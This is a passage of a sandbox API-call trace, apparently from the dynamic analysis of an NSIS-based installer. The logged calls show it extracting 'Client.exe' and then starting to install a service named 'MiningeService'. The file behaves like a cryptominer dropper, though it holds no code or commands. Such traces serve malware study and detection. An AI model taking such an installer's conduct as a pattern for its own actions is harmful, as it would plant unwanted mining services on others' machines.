lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.868] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.871] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.873] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.876] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.878] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.880] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.954] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.956] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.959] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.960] GetTickCount () returned 0x1d61411 [0272.960] MulDiv (nNumber=1572864, nNumerator=100, nDenominator=1931892) returned 81 [0272.960] wsprintfA (in: param_1=0x2d6fd44, param_2="... %d%%" | out: param_1="... 81%") returned 7 [0272.960] lstrlenA (lpString="Extract: Client.exe") returned 19 [0272.960] lstrlenA (lpString="... 81%") returned 7 [0272.960] lstrcatA (in: lpString1="Extract: Client.exe", lpString2="... 81%" | out: lpString1="Extract: Client.exe... 81%") returned="Extract: Client.exe... 81%" [0272.960] SetWindowTextA (hWnd=0x20324, lpString="Extract: Client.exe... 81%") returned 1 [0272.961] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x12 [0272.962] SendMessageA (hWnd=0x302f8, Msg=0x1006, wParam=0x0, lParam=0x2d6fcf8) returned 0x1 [0272.962] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x11, lParam=0x0) returned 0x1 [0272.962] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.963] GetTickCount () returned 0x1d61411 [0272.963] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xea1, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xea1, lpOverlapped=0x0) returned 1 [0272.964] GetTickCount () returned 0x1d61411 [0272.964] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.964] GetTickCount () returned 0x1d61411 [0272.964] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.965] GetTickCount () returned 0x1d61411 [0272.965] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x3b3e, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x3b3e, lpOverlapped=0x0) returned 1 [0272.966] GetTickCount () returned 0x1d61411 [0272.966] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.966] GetTickCount () returned 0x1d61411 [0272.966] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.967] GetTickCount () returned 0x1d61411 [0272.967] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1e5e, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1e5e, lpOverlapped=0x0) returned 1 [0272.968] GetTickCount () returned 0x1d61411 [0272.968] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.968] GetTickCount () returned 0x1d61411 [0272.968] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.975] GetTickCount () returned 0x1d61411 [0272.975] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6756, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6756, lpOverlapped=0x0) returned 1 [0272.976] GetTickCount () returned 0x1d61421 [0272.976] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.977] GetTickCount () returned 0x1d61421 [0272.977] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.978] GetTickCount () returned 0x1d61421 [0272.978] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xa07, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xa07, lpOverlapped=0x0) returned 1 [0272.978] GetTickCount () returned 0x1d61421 [0272.978] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.978] GetTickCount () returned 0x1d61421 [0272.978] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x77ab, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x77ab, lpOverlapped=0x0) returned 1 [0272.979] GetTickCount () returned 0x1d61421 [0272.979] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.980] GetTickCount () returned 0x1d61421 [0272.980] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.981] GetTickCount () returned 0x1d61421 [0272.981] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x27da, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x27da, lpOverlapped=0x0) returned 1 [0272.981] GetTickCount () returned 0x1d61421 [0272.981] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.982] GetTickCount () returned 0x1d61421 [0272.982] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.983] GetTickCount () returned 0x1d61421 [0272.983] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.984] GetTickCount () returned 0x1d61421 [0272.984] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x4095, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x4095, lpOverlapped=0x0) returned 1 [0272.984] GetTickCount () returned 0x1d61421 [0272.984] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.985] GetTickCount () returned 0x1d61421 [0272.985] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x54eb, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x54eb, lpOverlapped=0x0) returned 1 [0272.985] GetTickCount () returned 0x1d61421 [0272.985] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.986] GetTickCount () returned 0x1d61421 [0272.986] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6a7f, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6a7f, lpOverlapped=0x0) returned 1 [0272.987] GetTickCount () returned 0x1d61421 [0272.987] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.988] GetTickCount () returned 0x1d61421 [0272.988] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6741, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6741, lpOverlapped=0x0) returned 1 [0272.989] GetTickCount () returned 0x1d61421 [0272.989] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.989] GetTickCount () returned 0x1d61421 [0272.989] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6824, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6824, lpOverlapped=0x0) returned 1 [0272.990] GetTickCount () returned 0x1d61421 [0272.990] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.990] GetTickCount () returned 0x1d61421 [0272.990] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x7403, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x7403, lpOverlapped=0x0) returned 1 [0272.991] GetTickCount () returned 0x1d61431 [0272.991] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.992] GetTickCount () returned 0x1d61431 [0272.992] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6599, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6599, lpOverlapped=0x0) returned 1 [0272.992] GetTickCount () returned 0x1d61431 [0272.992] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.993] GetTickCount () returned 0x1d61431 [0272.993] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x681d, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x681d, lpOverlapped=0x0) returned 1 [0272.994] GetTickCount () returned 0x1d61431 [0272.994] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.994] GetTickCount () returned 0x1d61431 [0272.994] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x64ba, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x64ba, lpOverlapped=0x0) returned 1 [0272.995] GetTickCount () returned 0x1d61431 [0272.995] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.995] GetTickCount () returned 0x1d61431 [0272.995] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6198, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6198, lpOverlapped=0x0) returned 1 [0272.996] GetTickCount () returned 0x1d61431 [0272.996] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.996] GetTickCount () returned 0x1d61431 [0272.996] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0273.012] GetTickCount () returned 0x1d61440 [0273.012] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x197, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x197, lpOverlapped=0x0) returned 1 [0273.012] GetTickCount () returned 0x1d61440 [0273.012] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0273.013] GetTickCount () returned 0x1d61440 [0273.013] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x7fbf, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x7fbf, lpOverlapped=0x0) returned 1 [0273.015] GetTickCount () returned 0x1d61440 [0273.015] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0273.015] GetTickCount () returned 0x1d61440 [0273.015] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6370, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6370, lpOverlapped=0x0) returned 1 [0273.016] GetTickCount () returned 0x1d61440 [0273.016] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0273.016] GetTickCount () returned 0x1d61440 [0273.016] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0273.017] GetTickCount () returned 0x1d61440 [0273.017] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x51d9, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x51d9, lpOverlapped=0x0) returned 1 [0273.018] GetTickCount () returned 0x1d61440 [0273.018] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0273.018] GetTickCount () returned 0x1d61440 [0273.018] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0273.019] GetTickCount () returned 0x1d61440 [0273.019] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0273.020] GetTickCount () returned 0x1d61440 [0273.020] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6a0c, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6a0c, lpOverlapped=0x0) returned 1 [0273.021] GetTickCount () returned 0x1d61440 [0273.021] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x3a74, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x3a74, lpOverlapped=0x0) returned 1 [0273.021] GetTickCount () returned 0x1d61440 [0273.021] MulDiv (nNumber=1931892, nNumerator=100, nDenominator=1931892) returned 100 [0273.022] wsprintfA (in: param_1=0x2d6fd44, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0273.022] lstrlenA (lpString="Extract: Client.exe") returned 19 [0273.022] lstrlenA (lpString="... 100%") returned 8 [0273.022] lstrcatA (in: lpString1="Extract: Client.exe", lpString2="... 100%" | out: lpString1="Extract: Client.exe... 100%") returned="Extract: Client.exe... 100%" [0273.022] SetWindowTextA (hWnd=0x20324, lpString="Extract: Client.exe... 100%") returned 1 [0273.023] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x12 [0273.023] SendMessageA (hWnd=0x302f8, Msg=0x1006, wParam=0x0, lParam=0x2d6fcf8) returned 0x1 [0273.024] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x11, lParam=0x0) returned 0x1 [0273.024] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0273.025] GetTickCount () returned 0x1d61450 [0273.025] MulDiv (nNumber=1931892, nNumerator=100, nDenominator=1931892) returned 100 [0273.025] wsprintfA (in: param_1=0x2d6fd44, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0273.025] lstrlenA (lpString="Extract: Client.exe") returned 19 [0273.025] lstrlenA (lpString="... 100%") returned 8 [0273.025] lstrcatA (in: lpString1="Extract: Client.exe", lpString2="... 100%" | out: lpString1="Extract: Client.exe... 100%") returned="Extract: Client.exe... 100%" [0273.025] SetWindowTextA (hWnd=0x20324, lpString="Extract: Client.exe... 100%") returned 1 [0273.026] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x12 [0273.026] SendMessageA (hWnd=0x302f8, Msg=0x1006, wParam=0x0, lParam=0x2d6fcf8) returned 0x1 [0273.027] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x11, lParam=0x0) returned 0x1 [0273.027] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x9d2, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x9d2, lpOverlapped=0x0) returned 1 [0273.027] SetFileTime (hFile=0x1c, lpCreationTime=0x2d6ff4c, lpLastAccessTime=0x0, lpLastWriteTime=0x2d6ff4c) returned 1 [0273.027] CloseHandle (hObject=0x1c) returned 1 [0273.366] MulDiv (nNumber=39, nNumerator=30000, nDenominator=60) returned 19500 [0273.366] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x4c2c, lParam=0x0) returned 0x4a38 [0273.367] lstrcpynA (in: lpString1=0x42a048, lpString2="Install services MiningeService...", iMaxLength=1024 | out: lpString1="Install services MiningeService...") returned="Install services MiningeService..." [0273.367] lstrlenA (lpString="Install services MiningeService...") returned 34 [0273.367] SetWindowTextA (hWnd=0x20324, lpString="Install services MiningeService...") returned 1 [0273.368] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x12 [0273.368] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x12 [0273.370] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x12, lParam=0x0) returned 0x1 [0273.373] MulDiv (nNumber=40, nNumerator=30000, nDenominator=60) returned 20000 [0273.373] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x4e20, lParam=0x0) returned 0x4c2c [0273.376] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0273.377] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0273.377] lstrcpynA (in: lpString1=0x40ac10, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0273.377] lstrcpynA (in: lpString1=0x40b010, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0273.377] lstrcmpiA (lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", lpString2="") returned 1 [0273.377] MulDiv (nNumber=41, nNumerator=30000, nDenominator=60) returned 20500 [0273.377] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x5014, lParam=0x0) returned 0x4e20 [0273.377] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0273.378] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0273.378] lstrcpynA (in: lpString1=0x40b010, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0273.378] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0273.378] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll")) returned 0x2020 [0273.378] CreateFileA 